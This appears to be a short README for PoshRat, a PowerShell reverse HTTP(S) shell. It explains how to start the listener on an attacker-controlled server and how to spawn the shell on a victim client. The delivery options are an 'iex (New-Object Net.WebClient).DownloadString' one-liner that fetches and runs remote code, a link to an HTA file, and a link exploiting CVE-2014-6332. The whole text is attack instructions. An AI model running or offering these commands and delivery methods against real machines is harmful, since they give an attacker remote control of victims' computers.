PowerShell Reverse HTTP(s) Shell
-
Invoke PoshRat.ps1 On An A server you control. Requires Admin rights to listen on ports.
-
To Spawn The Reverse Shell Run On Client
iex (New-Object Net.WebClient).DownloadString("https://server/connect")
-
[OR] Browse to or send link to https://server/app.hta
-
[OR] For CVE-2014-6332 Send link to https://server/app.html
Created By Casey Smith @subTee